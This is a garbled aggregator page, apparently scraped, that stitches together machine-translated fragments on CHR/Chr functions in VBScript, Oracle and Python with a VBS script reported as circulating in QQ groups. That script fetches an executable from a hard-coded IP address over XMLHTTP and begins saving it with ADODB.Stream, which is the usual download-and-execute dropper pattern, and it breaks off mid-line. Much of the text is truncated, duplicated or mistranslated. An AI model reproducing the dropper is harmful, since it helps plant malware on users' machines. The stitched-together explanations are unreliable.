Return result of the CHR function: Return string, which contains the specified characterCodeRelated characters.
The CHR ("0") is a string of 0 characters.
CHR ("1 ")
CHR ("2 ")
CHR ("3 ")
CHR ("4 ")
CHR ("5 ")
CHR ("6 ")
CHR ("7")
I don't know whether it was recently or before. In the past few days, I often saw a vbs In the QQ group.
Code .
Copy code The Code is as follows: Set wshshell = wscript. Createobject ("wscript. Shell ")
Wshshell. appactivate "group-Powers member
Do not know is recently or before, anyway is these days often on the internet to see a brush QQ group of VBS code.
Copy Code code as follows:
Set wshshell= wscript.createobject ("Wscript.Shell")
Wshshell.appactivate "Group-Powers
Set post = Createobject ("msxml2.xmlhttp ")
Set shell = Createobject ("wscript. Shell ")
Post. Open "get", "http: // 202.75.208.29/calc.exe", 0
Post. Send ()
Set aget = Createobject ("ADODB. Stream ")
Aget. mode = 3
Aget. type = 1
Aget. open ()
Aget.
The Chr () function converts ASCII code to character: character – ASCII;The ASCII () function converts a character to an ASCII code: ASCII code-"character;In Oracle, the CHR () function and ASCII () are a pair of inverse functions.Chr () Function
Chr, ChrW functions
The Visual Basic language character function that returns the character associated with the specified character code. The CHR, ChrW function returns the character associated with the specified character code. Public Function
Created:
Article attributes: original
Article submission: T_Torchidy (jnchaha_at_163.com)
Oracle web Environment Injection Technology## BY Jianxin# Http://www.loveshell.net/#
Preface
I am not a professional database administrator, nor a researcher
Chr, unichr, and ord can be used as character type conversion in Python. here we will talk about the comparison between chr, unichr, and ord character functions in Python, for more information, see chr, unichr, and ord. they can be used as character
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.